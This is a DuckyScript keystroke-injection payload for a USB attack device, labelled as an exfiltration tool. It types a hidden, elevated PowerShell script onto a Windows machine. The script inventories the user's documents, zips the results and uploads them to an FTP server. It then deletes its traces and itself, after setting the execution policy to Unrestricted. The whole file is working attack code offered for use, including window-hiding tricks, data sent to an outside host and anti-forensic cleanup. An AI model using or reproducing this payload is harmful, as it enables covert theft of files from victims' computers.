115 lines
3.4 KiB
Plaintext
115 lines
3.4 KiB
Plaintext
REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
|
|
REM Description: Exfiltrate documents and upload them to a ftp server.
|
|
REM Version: 1.0
|
|
REM Category: Exfiltration
|
|
DELAY 800
|
|
GUI r
|
|
DELAY 1000
|
|
STRING powershell Start-Process notepad -Verb runAs
|
|
ENTER
|
|
DELAY 800
|
|
ALT y
|
|
DELAY 800
|
|
ENTER
|
|
ALT SPACE
|
|
DELAY 1000
|
|
STRING m
|
|
DELAY 1000
|
|
DOWNARROW
|
|
REPEAT 100
|
|
ENTER
|
|
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
|
|
ENTER
|
|
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime
|
|
ENTER
|
|
STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory
|
|
ENTER
|
|
STRING $date = get-date
|
|
ENTER
|
|
STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"
|
|
ENTER
|
|
STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'
|
|
ENTER
|
|
STRING $Report = $Report + "<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"
|
|
ENTER
|
|
STRING $Report = $Report + '<div id=center><h3>User Documents (doc,docx,pdf,rar)</h3>'
|
|
ENTER
|
|
STRING $Report = $Report + (Get-ChildItem -Path $userDir -Include *.doc, *.docx, *.pdf, *.zip, *.rar -Recurse |convertto-html Directory, Name, LastAccessTime)
|
|
ENTER
|
|
STRING $Report = $Report + '</div>'
|
|
ENTER
|
|
STRING $Report >> $fileSaveDir'/ComputerInfo.html'
|
|
ENTER
|
|
STRING function copy-ToZip($fileSaveDir){
|
|
ENTER
|
|
STRING $srcdir = $fileSaveDir
|
|
ENTER
|
|
STRING $zipFile = 'C:\Windows\Report.zip'
|
|
ENTER
|
|
STRING if(-not (test-path($zipFile))) {
|
|
ENTER
|
|
STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
|
|
ENTER
|
|
STRING (dir $zipFile).IsReadOnly = $false}
|
|
ENTER
|
|
STRING $shellApplication = new-object -com shell.application
|
|
ENTER
|
|
STRING $zipPackage = $shellApplication.NameSpace($zipFile)
|
|
ENTER
|
|
STRING $files = Get-ChildItem -Path $srcdir
|
|
ENTER
|
|
STRING foreach($file in $files) {
|
|
ENTER
|
|
STRING $zipPackage.CopyHere($file.FullName)
|
|
ENTER
|
|
STRING while($zipPackage.Items().Item($file.name) -eq $null){
|
|
ENTER
|
|
STRING Start-sleep -seconds 1 }}}
|
|
ENTER
|
|
STRING copy-ToZip($fileSaveDir)
|
|
ENTER
|
|
STRING $final = 'C:\Windows\Report.zip'
|
|
ENTER
|
|
STRING $ftpAddr = "ftp://username:password@ftp.host.com/Report.zip"
|
|
ENTER
|
|
STRING $browser = New-Object System.Net.WebClient
|
|
ENTER
|
|
STRING $url = New-Object System.Uri($ftpAddr)
|
|
ENTER
|
|
STRING $browser.UploadFile($url, $final)
|
|
ENTER
|
|
STRING remove-item $fileSaveDir -recurse
|
|
ENTER
|
|
STRING remove-item 'C:\Windows\Report.zip'
|
|
ENTER
|
|
STRING Remove-Item $MyINvocation.InvocationName
|
|
ENTER
|
|
CTRL s
|
|
DELAY 800
|
|
STRING C:\Windows\config-58477.ps1
|
|
ENTER
|
|
DELAY 1000
|
|
ALT F4
|
|
DELAY 800
|
|
GUI r
|
|
DELAY 800
|
|
STRING powershell Start-Process cmd -Verb runAs
|
|
ENTER
|
|
DELAY 800
|
|
ALT y
|
|
DELAY 1000
|
|
STRING mode con:cols=14 lines=1
|
|
ENTER
|
|
ALT SPACE
|
|
DELAY 800
|
|
STRING m
|
|
DELAY 1000
|
|
DOWNARROW
|
|
REPEAT 100
|
|
ENTER
|
|
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
|
|
ENTER
|
|
DELAY 800
|
|
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-58477.ps1
|
|
ENTER
|